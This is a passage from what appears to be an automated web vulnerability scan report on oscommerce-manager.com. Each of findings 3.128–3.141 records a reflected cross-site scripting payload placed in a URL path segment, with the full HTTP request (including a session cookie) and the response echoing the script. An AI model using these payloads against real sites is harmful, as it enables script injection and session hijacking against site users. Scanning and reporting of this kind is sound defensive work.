Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/jsf6363"><script>alert(1)</script>1aac51cff8/auto_image_handling.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.128. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce5"><script>alert(1)</script>83eb18f0444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/js/auto_image_handling.jsc9ce5"><script>alert(1)</script>83eb18f0444?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.jsc9ce5"><script>alert(1)</script>83eb18f0444?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.129. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90cd"><script>alert(1)</script>3c6d67d4f10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesd90cd"><script>alert(1)</script>3c6d67d4f10/lightbox2/js/lightbox.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modulesd90cd"><script>alert(1)</script>3c6d67d4f10/lightbox2/js/lightbox.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.130. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b61e"><script>alert(1)</script>9ae9ad7a90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox29b61e"><script>alert(1)</script>9ae9ad7a90d/js/lightbox.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox29b61e"><script>alert(1)</script>9ae9ad7a90d/js/lightbox.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.131. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c7e"><script>alert(1)</script>c193572c9b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/js74c7e"><script>alert(1)</script>c193572c9b0/lightbox.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:02:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/js74c7e"><script>alert(1)</script>c193572c9b0/lightbox.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.132. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e838b"><script>alert(1)</script>c7a2b0b1109 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/js/lightbox.jse838b"><script>alert(1)</script>c7a2b0b1109?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:02:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/js/lightbox.jse838b"><script>alert(1)</script>c7a2b0b1109?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.133. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810c9"><script>alert(1)</script>4c29409ea48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules810c9"><script>alert(1)</script>4c29409ea48/node/node.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules810c9"><script>alert(1)</script>4c29409ea48/node/node.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.134. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ffe"><script>alert(1)</script>cc6210ba8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/nodee6ffe"><script>alert(1)</script>cc6210ba8e5/node.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/nodee6ffe"><script>alert(1)</script>cc6210ba8e5/node.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.135. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca473"><script>alert(1)</script>135982207b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/node/node.cssca473"><script>alert(1)</script>135982207b2?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/node/node.cssca473"><script>alert(1)</script>135982207b2?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.136. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d27"><script>alert(1)</script>90d976281d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules83d27"><script>alert(1)</script>90d976281d5/system/defaults.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules83d27"><script>alert(1)</script>90d976281d5/system/defaults.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.137. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97c4"><script>alert(1)</script>d3f5fc0f678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/systemd97c4"><script>alert(1)</script>d3f5fc0f678/defaults.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/systemd97c4"><script>alert(1)</script>d3f5fc0f678/defaults.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.138. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6930"><script>alert(1)</script>e13ba40e060 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system/defaults.cssb6930"><script>alert(1)</script>e13ba40e060?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/system/defaults.cssb6930"><script>alert(1)</script>e13ba40e060?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.139. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d41"><script>alert(1)</script>0b40349dd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules57d41"><script>alert(1)</script>0b40349dd1e/system/system-menus.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules57d41"><script>alert(1)</script>0b40349dd1e/system/system-menus.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.140. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90fb"><script>alert(1)</script>1ea0e7a080 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/systemf90fb"><script>alert(1)</script>1ea0e7a080/system-menus.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/systemf90fb"><script>alert(1)</script>1ea0e7a080/system-menus.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.141. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c53"><script>alert(1)</script>92c043d2bd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system/system-menus.css10c53"><script>alert(1)</script>92c043d2bd7?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
